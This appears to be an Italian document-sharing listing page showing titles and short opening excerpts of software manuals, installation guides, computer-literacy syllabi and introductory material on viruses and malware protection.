zonamatematica etutor EDITOR Guida all uso versione 4.1 zonamatematica Il portale De Agostini Scuola dedicato all insegnamento e all apprendimento della matematica nella scuola secondaria etutor EDITOR Guida all uso versione 4.1 zonamatematica etutor EDITOR

Dettagli

Sage Start Archivio file Guida. Dalla versione 2015 09.10.2014

Sage Start Archivio file Guida. Dalla versione 2015 09.10.2014 Sage Start Archivio file Guida Dalla versione 2015 09.10.2014 Sommario 1.0 Introduzione 3 1.1 Moduli con archivio file 3 1.2 Informazioni generali 3 1.2.1 Cancellazione di record di dati 4 1.2.2 Duplicazione

Dettagli

Come difendersi dai VIRUS

Come difendersi dai VIRUS Come difendersi dai VIRUS DEFINIZIONE Un virus è un programma, cioè una serie di istruzioni, scritte in un linguaggio di programmazione, in passato era di solito di basso livello*, mentre con l'avvento

Dettagli

Manuale dell utente. Ahead Software AG

Manuale dell utente. Ahead Software AG Manuale dell utente Ahead Software AG Indice 1 Informazioni su InCD...3 1.1 Cos è InCD?...3 1.2 Requisiti per l uso di InCD...3 1.3 Aggiornamenti...4 1.3.1 Suggerimenti per gli utenti di InCD 1.3...4 2

Dettagli

BOLLETTINO DI SICUREZZA INFORMATICA

BOLLETTINO DI SICUREZZA INFORMATICA STATO MAGGIORE DELLA DIFESA II Reparto Informazioni e Sicurezza Ufficio Sicurezza Difesa Sezione Gestione del Rischio CERT Difesa CC BOLLETTINO DI SICUREZZA INFORMATICA N. 1/2009 Il bollettino può essere

Dettagli

Scansione. Stampante/copiatrice WorkCentre C2424

Scansione. Stampante/copiatrice WorkCentre C2424 Scansione In questo capitolo sono inclusi i seguenti argomenti: "Nozioni di base sulla scansione" a pagina 4-2 "Installazione del driver di scansione" a pagina 4-4 "Regolazione delle opzioni di scansione"

Dettagli

Guida all installazione di METODO

Guida all installazione di METODO Guida all installazione di METODO In questo documento sono riportate, nell ordine, tutte le operazioni da seguire per una corretta installazione di Metodo. Per procedere con l installazione è necessario

Dettagli

Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale S/MIME rilasciato

Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale S/MIME rilasciato Guida all installazione e all utilizzo di un certificato personale S/MIME (GPSE) Introduzione ai certificati S/MIME e alla posta elettronica certificata...2 Procedura di installazione del certificato personale

Dettagli

Sequenza di finestre per lavorare con i punti di ripristino. e.g.

Sequenza di finestre per lavorare con i punti di ripristino. e.g. Un punto di ripristino è come una Istantanea della configurazione del PC che il sistema operativo crea e salva con l intento di dare all utente la possibilità di recuperare la configurazione stessa nel

Dettagli

Istruzioni Installazione, Registrazione e Configurazione di PEC Mailer

Istruzioni Installazione, Registrazione e Configurazione di PEC Mailer Istruzioni Installazione, Registrazione e Configurazione di PEC Mailer Elenco delle Istruzioni: 1- Download del Software PEC Mailer 2- Installazione del Software PEC Mailer 3- Registrazione del Software

Dettagli

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014)

Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Istruzioni per l installazione del software per gli esami ICoNExam (Aggiornate al 15/01/2014) Il software per gli esami ICON può essere eseguito su qualunque computer dotato di Java Virtual Machine aggiornata.

Dettagli

SOMMARIO. 1 ISTRUZIONI DI BASE. 2 CONFIGURAZIONE. 7 STORICO. 9 EDITOR HTML. 10 GESTIONE ISCRIZIONI E CANCELLAZIONI. 11 GESTIONE MAILING LIST.

SOMMARIO. 1 ISTRUZIONI DI BASE. 2 CONFIGURAZIONE. 7 STORICO. 9 EDITOR HTML. 10 GESTIONE ISCRIZIONI E CANCELLAZIONI. 11 GESTIONE MAILING LIST. INDICE 1) SOMMARIO... 1 2) ISTRUZIONI DI BASE... 2 3) CONFIGURAZIONE... 7 4) STORICO... 9 5) EDITOR HTML... 10 6) GESTIONE ISCRIZIONI E CANCELLAZIONI... 11 7) GESTIONE MAILING LIST... 12 8) E-MAIL MARKETING...

Dettagli

Corso di Alfabetizzazione Informatica

Corso di Alfabetizzazione Informatica Corso di Alfabetizzazione Informatica Scopo di questo corso, vuole essere quello di fornire ad ognuno dei partecipanti, indipendentemente dalle loro precedenti conoscenze informatiche, l apprendimento

Dettagli

SCOoffice Mail Connector for Microsoft Outlook. Guida all installazione Outlook 2002

SCOoffice Mail Connector for Microsoft Outlook. Guida all installazione Outlook 2002 SCOoffice Mail Connector for Microsoft Outlook Guida all installazione Outlook 2002 Rev. 1.1 4 dicembre 2002 SCOoffice Mail Connector for Microsoft Outlook Guida all installazione: Outlook XP Introduzione

Dettagli

Creazione Account PEC (Posta Elettronica Certificata)

Creazione Account PEC (Posta Elettronica Certificata) Creazione Account PEC (Posta Elettronica Certificata) Come già specificato, il software è stato realizzato per la gestione di account PEC (Posta Elettronica Certificata), ma consente di configurare anche

Dettagli

test di tipo teorico e pratico relativo a questo modulo.

test di tipo teorico e pratico relativo a questo modulo. 0RGXOR±1DYLJD]LRQHZHEHFRPXQLFD]LRQH Il seguente Syllabus è relativo al Modulo 7, 1DYLJD]LRQHZHEHFRPXQLFD]LRQH, e fornisce i fondamenti per il test di tipo teorico e pratico relativo a questo modulo. 6FRSLGHOPRGXOR

Dettagli

Gestione completa delle prestazioni

Gestione completa delle prestazioni Gestione completa delle prestazioni Funziona anche con Windows XP e Windows Vista 2013 Un applicazione agile e potente per la messa a punto e la manutenzione delle prestazioni del vostro computer. Download

Dettagli

CORSO 01: INFORMATICA DI BASE

CORSO 01: INFORMATICA DI BASE CORSO 01: INFORMATICA DI BASE PARTIRE DA ZERO 1.01 Hardware e Software 1.02 Conoscere l'hardware USARE IL PC con WINDOWS VISTA e 7(Seven) 1.03 Usare il sistema operativo Windows 7 e Vista 1.04 Controllare

Dettagli

SCOoffice Mail Connector for Microsoft Outlook. Guida all installazione Outlook 97, 98 e 2000

SCOoffice Mail Connector for Microsoft Outlook. Guida all installazione Outlook 97, 98 e 2000 SCOoffice Mail Connector for Microsoft Outlook Guida all installazione Outlook 97, 98 e 2000 Rev. 1.1 4 dicembre 2002 SCOoffice Mail Connector for Microsoft Outlook Guida all installazione per Outlook

Dettagli

CORSO RETI I FORMATICHE E POSTA ELETTRO ICA

CORSO RETI I FORMATICHE E POSTA ELETTRO ICA CORSO RETI I FORMATICHE E POSTA ELETTRO ICA Programma basato su quello necessario per superare il corrispondente esame per la patente europea (modulo 7) Internet Concetti e termini Capire cosa è Internet

Dettagli

Aggiornamento programma da INTERNET

Aggiornamento programma da INTERNET Aggiornamento programma da INTERNET In questo documento sono riportate, nell ordine, tutte le operazioni da seguire per il corretto aggiornamento del ns. programma Metodo. Nel caso si debba aggiornare

Dettagli

PROGRAMMA COMPLETO DI INFORMATIZZAZIONE. Partire da Zero. Usare il PC

PROGRAMMA COMPLETO DI INFORMATIZZAZIONE. Partire da Zero. Usare il PC PROGRAMMA COMPLETO DI INFORMATIZZAZIONE Hardware e Software Partire da Zero Conoscere l'hardware (i componenti interni, le porte,[ ]) Tipi di computer e dispositivi digitali in commercio (PC Desktop e

Dettagli

Prova di informatica & Laboratorio di Informatica di Base

Prova di informatica & Laboratorio di Informatica di Base Prova di informatica & Laboratorio di Informatica di Base Prof. Orlando De Pietro Programma L' hardware Computer multiutente e personal computer Architettura convenzionale di un calcolatore L unità centrale

Dettagli

Manuale dell utente. InCD. ahead

Manuale dell utente. InCD. ahead Manuale dell utente InCD ahead Indice 1 Informazioni su InCD...1 1.1 Cos è InCD?...1 1.2 Requisiti per l uso di InCD...1 1.3 Aggiornamenti...2 1.3.1 Suggerimenti per gli utenti di InCD 1.3...2 2 Installazione...3

Dettagli

Eusing Free Registry Cleaner Guida in lingua italiana

Eusing Free Registry Cleaner Guida in lingua italiana Eusing Free Registry Cleaner Guida in lingua italiana 1 Corrispondenze inglese/italiano dei termini del pannello Sommario/Indice Sommario Overview = Panoramica Interface = Interfaccia What can Eusing Free

Dettagli

Che cosa è un VIRUS?

Che cosa è un VIRUS? Virus & Antivirus Virus Nella sicurezza informatica un virus è un software, appartenente alla categoria dei malware, che è in grado, una volta eseguito, di infettare dei file in modo da riprodursi facendo

Dettagli

2. Salvare il file (cartella di lavoro) con il nome Tabelline 3. Creare le seguenti due tabelle (una tabellina non compilata e una compilata)

2. Salvare il file (cartella di lavoro) con il nome Tabelline 3. Creare le seguenti due tabelle (una tabellina non compilata e una compilata) Tabellina Pitagorica Per costruire il foglio elettronico per la simulazione delle tabelline occorre: 1. Aprire Microsoft Excel 2. Salvare il file (cartella di lavoro) con il nome Tabelline 3. Creare le

Dettagli

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28

Indice. 1.13 Configurazione di PHP 26 1.14 Test dell ambiente di sviluppo 28 Indice 25 184 Introduzione XI Capitolo 1 Impostazione dell ambiente di sviluppo 2 1.1 Introduzione ai siti Web dinamici 2 1.2 Impostazione dell ambiente di sviluppo 4 1.3 Scaricamento di Apache 6 1.4 Installazione

Dettagli

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express)

Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express) Modulo 7 Navigazione web e comunicazione (Syllabus 5.0 Internet Explorer e Outlook Express) Ricordarsi di utilizzare, dove possibile, i diversi tipi di tecniche per svolgere i compiti richiesti: 1. comandi

Dettagli

Breve visione d insieme

Breve visione d insieme Breve visione d insieme Per accedere occorre semplicemente collegarsi alla pagina http://wm.infocom.it/ ed inserire il proprio indirizzo e-mail e password. Inserimento delle Vostre credenziali Multilingua

Dettagli

Le reti di calcolatori

Le reti di calcolatori Le reti di calcolatori 106 Le reti di calcolatori 1 Una rete è un complesso insieme di sistemi di elaborazione connessi tra loro tramite collegamenti fisici (linee telefoniche, cavi dedicati, etc.) o con

Dettagli

D R O P B O X COS È DROPBOX:

D R O P B O X COS È DROPBOX: D R O P B O X COS È DROPBOX: Dropbox è un applicazione per computer e ipad di condivisione e salvataggio files in un ambiente internet. Consiste fondamentalmente in un disco di rete, utilizzabile da più

Dettagli

bigini@cefriel.it http://www.cefriel.it/ns

bigini@cefriel.it http://www.cefriel.it/ns bigini@cefriel.it http://www.cefriel.it/ns Virus Macro Virus Worm Un programma in grado di riprodurre autonomamente il proprio codice, inserendolo in quello di un altro programma, in modo tale che questo

Dettagli

Scan to PC Desktop: Image Retriever 5.2 per Xerox WorkCentre C2424

Scan to PC Desktop: Image Retriever 5.2 per Xerox WorkCentre C2424 Scan to PC Desktop: Image Retriever 5.2 per Xerox WorkCentre C2424 Scan to PC Desktop comprende Image Retriever, progettato per monitorare una specifica cartella su un file server in rete o sull'unità

Dettagli

Modulo 7 Navigazione web e comunicazione

Modulo 7 Navigazione web e comunicazione Modulo 7 Navigazione web e comunicazione Il seguente Syllabus è relativo al Modulo 7, Navigazione web e comunicazione, e fornisce i fondamenti per il test di tipo teorico e pratico relativo a questo modulo.

Dettagli

Fattura Facile. In questo menù sono raggruppati, per tipologia, tutti i comandi che permettono di gestire la manutenzione degli archivi.

Fattura Facile. In questo menù sono raggruppati, per tipologia, tutti i comandi che permettono di gestire la manutenzione degli archivi. Fattura Facile Maschera di Avvio Fattura Facile all avvio si presenta come in figura. In questa finestra è possibile sia fare l accesso all archivio selezionato (Archivio.mdb) che eseguire la maggior parte

Dettagli

Il seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo

Il seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo Modulo 7 Reti informatiche Il seguente Syllabus è relativo al Modulo 7, Reti informatiche, e fornisce i fondamenti per il test di tipo pratico relativo a questo modulo Scopi del modulo Modulo 7 Reti informatiche,

Dettagli

Modulo 3 - Elaborazione Testi 3.1 Utilizzo applicazione

Modulo 3 - Elaborazione Testi 3.1 Utilizzo applicazione Università degli Studi dell Aquila Corso ECDL programma START Modulo 3 - Elaborazione Testi 3.1 Utilizzo applicazione Maria Maddalena Fornari Aprire il programma Per creare un nuovo documento oppure per

Dettagli

BIBLIOTECA COMUNALE DI BORUTTA

BIBLIOTECA COMUNALE DI BORUTTA BIBLIOTECA COMUNALE DI BORUTTA CORSO DI INFORMATICA DI BASE AVVISO Si informano gli interessati che presso la sala informatica annessa alla biblioteca comunale sarà attivato un corso di informatica di

Dettagli

Utilizzo di Conference Manager per Microsoft Outlook

Utilizzo di Conference Manager per Microsoft Outlook Utilizzo di Conference Manager per Microsoft Outlook Maggio 2012 Sommario Capitolo 1: Utilizzo di Conference Manager per Microsoft Outlook... 5 Presentazione di Conference Manager per Microsoft Outlook...

Dettagli

Compilazione rapporto di Audit in remoto

Compilazione rapporto di Audit in remoto Compilazione rapporto di Audit in remoto Installazione e manuale utente CSI S.p.A. V.le Lombardia 20-20021 Bollate (MI) Tel. 02.383301 Fax 02.3503940 E-mail: info@csi-spa.com Rev. 1.1 23/07/09 Indice Indice...

Dettagli

INFORMATION TECNOLOGY. a cura di Alessandro Padovani padoale@libero.it

INFORMATION TECNOLOGY. a cura di Alessandro Padovani padoale@libero.it INFORMATION TECNOLOGY 3 a cura di Alessandro Padovani padoale@libero.it 1 SICUREZZA DELLE INFORMAZIONI Le politiche di sicurezza dei dati informatici (che sono spesso il maggior patrimonio di un azienda)

Dettagli

Il traffico dati utilizzato per Tua Mail contribuisce ad erodere le eventuali soglie dati previste dal piano tariffario.

Il traffico dati utilizzato per Tua Mail contribuisce ad erodere le eventuali soglie dati previste dal piano tariffario. Manuale dell utente Da oggi con TuaMail puoi avere la tua casella mail sempre con te, sul tuo videofonino 3. Potrai leggere la tua posta, scrivere mail ai tuoi contatti della rubrica e visualizzare gli

Dettagli

Comando Generale Arma dei Carabinieri

Comando Generale Arma dei Carabinieri Comando Generale Arma dei Carabinieri Configurazioni per il collegamento al CONNECTRA Si Applica a: Windows 2000 sp4; Windows XP sp2; Data: 03 settembre 2007 Numero Revisione: 2.1 Configurazione per il

Dettagli

Operazioni da eseguire su tutti i computer

Operazioni da eseguire su tutti i computer Preparazione Computer per l utilizzo in Server Farm SEAC Reperibilità Software necessario per la configurazione del computer... 2 Verifica prerequisiti... 3 Rimozione vecchie versioni software...4 Operazioni

Dettagli

E' sempre valido il comando che si usa anche con Outlook Express e con Windows Mail: shift più control più V.

E' sempre valido il comando che si usa anche con Outlook Express e con Windows Mail: shift più control più V. Microsoft Outlook 2007. Di Nunziante Esposito. `*************` Decima ed ultima parte: Varie. `***********` Dopo aver impostato al meglio le opzioni ed il layout di questo browser, e dopo le indicazioni

Dettagli

Web File System Manuale utente Ver. 1.0

Web File System Manuale utente Ver. 1.0 Web File System Manuale utente Ver. 1.0 Via Malavolti 31 41100 Modena Tel. 059-2551137 www.keposnet.com Fax 059-2558867 info@keposnet.com Il KDoc è un Web File System cioè un file system accessibile via

Dettagli

PROCEDURE GENERALI ATTIVAZIONE MACRO

PROCEDURE GENERALI ATTIVAZIONE MACRO PROCEDURE GENERALI OBIETTIVO Attivazione macro GUIDA ALL UTILIZZO PREMESSA COS È UNA MACRO ATTIVAZIONE MACRO Che cos è una macro? Una macro è un automazione tramite software VBA (Visual Basic for Applications)

Dettagli

LEXTEL SPA GUIDA AL RINNOVO DEI CERTIFICATI DIGITALI

LEXTEL SPA GUIDA AL RINNOVO DEI CERTIFICATI DIGITALI LEXTEL SPA GUIDA AL RINNOVO DEI CERTIFICATI DIGITALI 2009 SOMMARIO INFORMAZIONI... 3 VERIFICA VERSIONE DIKE... 4 DOWNLOAD DIKE... 5 INSTALLAZIONE DIKE... 7 RIMUOVERE DIKE... 7 INSTALLARE DIKE... 7 DOWNLOAD

Dettagli

Airone Gestione Rifiuti Funzioni di Esportazione e Importazione

Airone Gestione Rifiuti Funzioni di Esportazione e Importazione Airone Gestione Rifiuti Funzioni di Esportazione e Importazione Airone Funzioni di Esportazione Importazione 1 Indice AIRONE GESTIONE RIFIUTI... 1 FUNZIONI DI ESPORTAZIONE E IMPORTAZIONE... 1 INDICE...

Dettagli

Medical Information System CGM DOCUMENTS. CompuGroup Medical Italia. CGM DOCUMENTS Pagina 1 di 12

Medical Information System CGM DOCUMENTS. CompuGroup Medical Italia. CGM DOCUMENTS Pagina 1 di 12 Medical Information System CGM DOCUMENTS CompuGroup Medical Italia CGM DOCUMENTS Pagina 1 di 12 Indice 1 INSTALLAZIONE... 3 1.1 SISTEMI OPERATIVI SUPPORTATI... 3 1.2 INSTALLAZIONE CGM DOCUMENTS MONOUTENZA

Dettagli

Acer edatasecurity Management

Acer edatasecurity Management 1 Acer edatasecurity Management Applicando le tecnologie di crittografia più avanzate, Acer edatasecurity Management offre agli utenti Acer PC una maggiore protezione dei dati personali e la possibilità

Dettagli

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8. La sicurezza

Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8. La sicurezza Insegnamento di Informatica CdS Scienze Giuridiche A.A. 2007/8 La sicurezza Prof. Valle D.ssa Folgieri Lez 10 del 23 11.07 Informatica e sicurezza 1 La sicurezza Connessione ad Internet diventata essenziale

Dettagli

Istruzioni Operative

Istruzioni Operative Soluzioni Paghe Gestionali d Impresa (ERP) Software Development E-Business Solutions ASP e Hosting System Integration e Networking Architetture Cluster Fornitura e Installazione Hardware Istruzioni Operative

Dettagli

Microsoft Excel Lezione 2

Microsoft Excel Lezione 2 Corso di Introduzione all Informatica Microsoft Excel Lezione 2 Esercitatore: Fabio Palopoli Formattazione del foglio di lavoro Cella [1/4 1/4] Formati numerici: menu Formato/Celle, scheda Numero Pulsante

Dettagli

Istruzioni per installare EpiData e i files dati ad uso di NetAudit

Istruzioni per installare EpiData e i files dati ad uso di NetAudit Istruzioni per installare EpiData a cura di Pasquale Falasca e Franco Del Zotti Brevi note sull utilizzo del software EpiData per una raccolta omogenea dei dati. Si tratta di istruzioni passo-passo utili

Dettagli

PREMESSA. Procedure di protezione che, ovviamente, dovranno essere riabilitate al termine dell'installazione.

PREMESSA. Procedure di protezione che, ovviamente, dovranno essere riabilitate al termine dell'installazione. PREMESSA E' buona e comune regola che, accingendosi a installare programmi che abbiano origine certa, si proceda preliminarmente alla disattivazione di Firewall e Antivirus. Procedure di protezione che,

Dettagli

MANUALE PARCELLA FACILE PLUS INDICE

MANUALE PARCELLA FACILE PLUS INDICE MANUALE PARCELLA FACILE PLUS INDICE Gestione Archivi 2 Configurazioni iniziali 3 Anagrafiche 4 Creazione prestazioni e distinta base 7 Documenti 9 Agenda lavori 12 Statistiche 13 GESTIONE ARCHIVI Nella

Dettagli

Bot Tutorial. NTR Italia Via Sangro, 29 20132 Milano Tel. +39 02 28 04 04 68 Fax +39 02 28 93 80 2 www.ntradmin.com www.ntrglobal.

Bot Tutorial. NTR Italia Via Sangro, 29 20132 Milano Tel. +39 02 28 04 04 68 Fax +39 02 28 93 80 2 www.ntradmin.com www.ntrglobal. Bot Tutorial NTR Italia Via Sangro, 29 20132 Milano Tel. +39 02 28 04 04 68 Fax +39 02 28 93 80 2 www.ntradmin.com www.ntrglobal.com Offices in Barcelona - Boston - Dallas - Heidelberg - London - Madrid

Dettagli

Difenditi dai Malware

Difenditi dai Malware con la collaborazione di Difenditi dai Malware Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Difenditi dai Malware

Dettagli

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1

Introduzione a Internet e cenni di sicurezza. Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Dott. Paolo Righetto 1 Introduzione a Internet e cenni di sicurezza Quadro generale: Internet Services Provider (ISP) Server WEB World Wide Web Rete ad alta

Dettagli

SERVER HALLEY. OGGETTO: aggiornamento della procedura HB SERVER HALLEY dalla versione 05.00.00 o superiore alla versione 05.00.31

SERVER HALLEY. OGGETTO: aggiornamento della procedura HB SERVER HALLEY dalla versione 05.00.00 o superiore alla versione 05.00.31 SERVER HALLEY OGGETTO: aggiornamento della procedura HB SERVER HALLEY dalla versione 05.00.00 o superiore alla versione 05.00.31 Nell inviarvi quanto in oggetto Vi ricordiamo che gli aggiornamenti vanno

Dettagli